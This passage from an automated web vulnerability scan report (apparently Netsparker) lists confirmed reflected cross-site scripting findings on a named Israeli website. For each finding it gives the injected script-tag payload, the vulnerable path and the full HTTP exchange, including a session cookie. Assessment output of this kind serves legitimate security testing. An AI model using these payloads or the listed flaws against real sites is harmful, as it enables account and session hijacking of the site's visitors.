3.65. /page/odot/'%22-%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%..
Parameters
Parameter    Type        Value
URI-BASED    Full URL    '"--></style></script> <script>alert(0x0004E2)</script>
Request
GET /page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004E2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:44 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/page/odot/'"--></style></script><script>netsparker(0x0004E2)</script><BR>script><BR>style><<script>netsparker(0x0004E2)<.asp?id=script>
3.66. /about/search/
CONFIRMED
http://www.shalomlaam.co.il/about/search/?'"--></style></script><script>alert(0x000534)</script>
Parameters
Parameter      Type            Value
Query Based    Query String    '"--></style></script> <script>alert(0x000534)</script>
Request
GET /about/search/?'"--></style></script><script>netsparker(0x000534)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

404;http://www.shalomlaam.co.il:80/about/search/?'"--></style></script><script>netsparker(0x000534)</script><BR>script><BR>style><<script>netsparker(0x000534)<.asp?id=script>
3.67. /reg/maillingUpdate.asp'%22-%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter    Type        Value
URI-BASED    Full URL    '"--></style></script> <script>alert(0x0001D5)</script>